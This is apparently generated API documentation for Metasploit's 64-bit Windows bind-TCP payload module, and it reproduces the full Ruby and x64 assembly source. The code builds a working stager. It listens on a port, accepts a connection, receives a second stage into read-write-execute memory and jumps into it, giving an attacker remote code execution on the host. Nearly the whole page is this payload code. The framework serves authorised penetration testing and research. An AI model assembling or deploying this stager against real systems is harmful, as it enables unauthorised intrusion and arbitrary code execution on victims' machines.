Module: Msf::Payload::Windows::BindTcp_x64

Includes:
TransportConfig, Msf::Payload::Windows, BlockApi_x64, Exitfunk_x64, SendUUID_x64
Included in:
BindTcpRc4_x64
Defined in:
lib/msf/core/payload/windows/x64/bind_tcp.rb

Overview

Complex bindtcp payload generation for Windows ARCH_X64

Constant Summary

Constants included from Rex::Payloads::Meterpreter::UriChecksum

Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_CONN, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_CONN_MAX_LEN, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_INITJ, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_INITN, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_INITP, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_INITW, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_INIT_CONN, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_MIN_LEN, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_MODES, Rex::Payloads::Meterpreter::UriChecksum::URI_CHECKSUM_UUID_MIN_LEN

Instance Method Summary collapse

Methods included from Exitfunk_x64

#asm_exitfunk

Methods included from BlockApi_x64

#asm_block_api

Methods included from SendUUID_x64

#asm_send_uuid, #uuid_required_size

Methods included from Msf::Payload::Windows

#apply_prepends, exit_types, #handle_intermediate_stage, #initialize, #replace_var

Methods included from PrependMigrate

#apply_prepend_migrate, #initialize, #prepend_migrate, #prepend_migrate?, #prepend_migrate_64

Methods included from TransportConfig

#transport_config_bind_named_pipe, #transport_config_bind_tcp, #transport_config_reverse_http, #transport_config_reverse_https, #transport_config_reverse_ipv6_tcp, #transport_config_reverse_named_pipe, #transport_config_reverse_tcp, #transport_config_reverse_udp, #transport_uri_components

Methods included from UUID::Options

#generate_payload_uuid, #generate_uri_uuid_mode, #initialize, #record_payload_uuid, #record_payload_uuid_url

Methods included from Rex::Payloads::Meterpreter::UriChecksum

#generate_uri_checksum, #generate_uri_uuid, #process_uri_resource, #uri_checksum_lookup

Methods included from Pingback::Options

#initialize

Instance Method Details

#asm_bind_tcp(opts = {}) ⇒ Object

Generate an assembly stub with the configured feature set and options.

Parameters:

  • opts (Hash) (defaults to: {})

    a customizable set of options

Options Hash (opts):

  • :port (Integer)

    The port to connect to

  • :exitfunk (String)

    The exit method to use if there is an error, one of process, thread, or seh

  • :reliable (Bool)

    Whether or not to enable error handling code


108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
# File 'lib/msf/core/payload/windows/x64/bind_tcp.rb', line 108

def asm_bind_tcp(opts={})
  reliable      = opts[:reliable]
  addr_fam      = 2
  sockaddr_size = 16
  stack_alloc   = 408+8+8*6+32*7

  if use_ipv6
    addr_fam      = 23
    sockaddr_size = 28
    stack_alloc  += 8*2 # two more rax pushes
  end

  encoded_port = "0x%.16x" % [opts[:port].to_i, addr_fam].pack("vn").unpack("N").first

  asm = %Q^
    bind_tcp:
      ; setup the structures we need on the stack...
      mov r14, 'ws2_32'
      push r14               ; Push the bytes 'ws2_32',0,0 onto the stack.
      mov r14, rsp           ; save pointer to the "ws2_32" string for LoadLibraryA call.
      sub rsp, 408+8         ; alloc sizeof( struct WSAData ) bytes for the WSAData
                             ; structure (+8 for alignment)
      mov r13, rsp           ; save pointer to the WSAData structure for WSAStartup call.
      xor rax, rax
  ^

  if use_ipv6
    asm << %Q^
      ; IPv6 requires another 12 zero-bytes for the socket structure,
      ; so push 16 more onto the stack
      push rax
      push rax
    ^
  end

  asm << %Q^
      push rax               ; stack alignment
      push rax               ; tail-end of the sockaddr_in/6 struct
      mov r12, #{encoded_port}
      push r12               ; bind to 0.0.0.0/[::] family AF_INET/6 and specified port
      mov r12, rsp           ; save pointer to sockaddr_in struct for bind call

      ; perform the call to LoadLibraryA...
      mov rcx, r14           ; set the param for the library to load
      mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')}
      call rbp               ; LoadLibraryA( "ws2_32" )

      ; perform the call to WSAStartup...
      mov rdx, r13           ; second param is a pointer to this stuct
      push 0x0101            ;
      pop rcx                ; set the param for the version requested
      mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'WSAStartup')}
      call rbp               ; WSAStartup( 0x0101, &WSAData );

      ; perform the call to WSASocketA...
      push #{addr_fam}       ; push AF_INET/6
      pop rcx                ; pop family into rcx
      push rax               ; if we succeed, rax wil be zero, push zero for the flags param.
      push rax               ; push null for reserved parameter
      xor r9, r9             ; we do not specify a WSAPROTOCOL_INFO structure
      xor r8, r8             ; we do not specify a protocol
      inc rax                ;
      mov rdx, rax           ; push SOCK_STREAM
      mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'WSASocketA')}
      call rbp               ; WSASocketA( AF_INET/6, SOCK_STREAM, 0, 0, 0, 0 );
      mov rdi, rax           ; save the socket for later

      ; perform the call to bind...
      push #{sockaddr_size}
      pop r8                 ; length of the sockaddr_in struct (we only set the
                             ; first 8 bytes as the rest aren't used)
      mov rdx, r12           ; set the pointer to sockaddr_in struct
      mov rcx, rdi           ; socket
      mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'bind')}
      call rbp               ; bind( s, &sockaddr_in, #{sockaddr_size} );

      ; perform the call to listen...
      xor rdx, rdx           ; backlog
      mov rcx, rdi           ; socket
      mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'listen')}
      call rbp               ; listen( s, 0 );

      ; perform the call to accept...
      xor r8, r8             ; we set length for the sockaddr struct to zero
      xor rdx, rdx           ; we dont set the optional sockaddr param
      mov rcx, rdi           ; listening socket
      mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'accept')}
      call rbp               ; accept( s, 0, 0 );

      ; perform the call to closesocket...
      mov rcx, rdi           ; the listening socket to close
      mov rdi, rax           ; swap the new connected socket over the listening socket
      mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'closesocket')}
      call rbp               ; closesocket( s );

      ; restore RSP so we dont have any alignment issues with the next block...
      add rsp, #{stack_alloc} ; cleanup the stack allocations
  ^

  asm << asm_send_uuid if include_send_uuid
  return asm
end

#asm_block_recv(opts = {}) ⇒ Object


211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
# File 'lib/msf/core/payload/windows/x64/bind_tcp.rb', line 211

def asm_block_recv(opts={})

  asm = %Q^
    recv:
      ; Receive the size of the incoming second stage...
      sub rsp, 16            ; alloc some space (16 bytes) on stack for to hold the second stage length
      mov rdx, rsp           ; set pointer to this buffer
      xor r9, r9             ; flags
      push 4                 ;
      pop r8                 ; length = sizeof( DWORD );
      mov rcx, rdi           ; the saved socket
      mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')}
      call rbp               ; recv( s, &dwLength, 4, 0 );
      add rsp, 32            ; we restore RSP from the api_call so we can pop off RSI next

      ; Alloc a RWX buffer for the second stage
      pop rsi                ; pop off the second stage length
      mov esi, esi           ; only use the lower-order 32 bits for the size
      push 0x40              ;
      pop r9                 ; PAGE_EXECUTE_READWRITE
      push 0x1000            ;
      pop r8                 ; MEM_COMMIT
      mov rdx, rsi           ; the newly recieved second stage length.
      xor rcx, rcx           ; NULL as we dont care where the allocation is.
      mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'VirtualAlloc')}
      call rbp               ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );

      ; Receive the second stage and execute it...
      mov rbx, rax           ; rbx = our new memory address for the new stage
      mov r15, rax           ; save the address so we can jump into it later

    read_more:               ;
      xor r9, r9             ; flags
      mov r8, rsi            ; length
      mov rdx, rbx           ; the current address into our second stages RWX buffer
      mov rcx, rdi           ; the saved socket
      mov r10d, #{Rex::Text.block_api_hash('ws2_32.dll', 'recv')}
      call rbp               ; recv( s, buffer, length, 0 );

      add rbx, rax           ; buffer += bytes_received
      sub rsi, rax           ; length -= bytes_received
      test rsi, rsi          ; test length
      jnz read_more          ; continue if we have more to read
      jmp r15                ; return into the second stage
  ^

  if opts[:exitfunk]
    asm << asm_exitfunk(opts)
  end

  asm
end

#generateObject

Generate the first stage


28
29
30
31
32
33
34
35
36
37
38
39
40
41
# File 'lib/msf/core/payload/windows/x64/bind_tcp.rb', line 28

def generate
  conf = {
    port:     datastore['LPORT'],
    reliable: false
  }

  # Generate the more advanced stager if we have the space
  if self.available_space && required_space <= self.available_space
    conf[:exitfunk] = datastore['EXITFUNC']
    conf[:reliable] = true
  end

  generate_bind_tcp(conf)
end

#generate_bind_tcp(opts = {}) ⇒ Object

Generate and compile the stager


62
63
64
65
66
67
68
69
70
71
72
73
74
# File 'lib/msf/core/payload/windows/x64/bind_tcp.rb', line 62

def generate_bind_tcp(opts={})
  combined_asm = %Q^
    cld                    ; Clear the direction flag.
    and rsp, 0xFFFFFFFFFFFFFFF0 ; Ensure RSP is 16 byte aligned
    call start             ; Call start, this pushes the address of 'api_call' onto the stack.
    #{asm_block_api}
    start:
      pop rbp              ; pop off the address of 'api_call' for calling later.
    #{asm_bind_tcp(opts)}
    #{asm_block_recv(opts)}
  ^
  Metasm::Shellcode.assemble(Metasm::X64.new, combined_asm).encode_string
end

#include_send_uuidObject

By default, we don't want to send the UUID, but we'll send for certain payloads if requested.


47
48
49
# File 'lib/msf/core/payload/windows/x64/bind_tcp.rb', line 47

def include_send_uuid
  false
end

#required_spaceObject

Determine the maximum amount of space required for the features requested


79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
# File 'lib/msf/core/payload/windows/x64/bind_tcp.rb', line 79

def required_space
  # Start with our cached default generated size
  space = cached_size

  # EXITFUNK processing adds 31 bytes at most (for ExitThread, only ~16 for others)
  space += 31

  # EXITFUNK unset will still call ExitProces, which adds 7 bytes (accounted for above)

  # TODO: this is coming soon
  # Reliability checks add 4 bytes for the first check, 5 per recv check (2)
  #space += 14

  # 2 more bytes are added for IPv6
  space += 2 if use_ipv6

  space += uuid_required_size if include_send_uuid

  # The final estimated size
  space
end

#transport_config(opts = {}) ⇒ Object


55
56
57
# File 'lib/msf/core/payload/windows/x64/bind_tcp.rb', line 55

def transport_config(opts={})
  transport_config_bind_tcp(opts)
end

#use_ipv6Object


51
52
53
# File 'lib/msf/core/payload/windows/x64/bind_tcp.rb', line 51

def use_ipv6
  false
end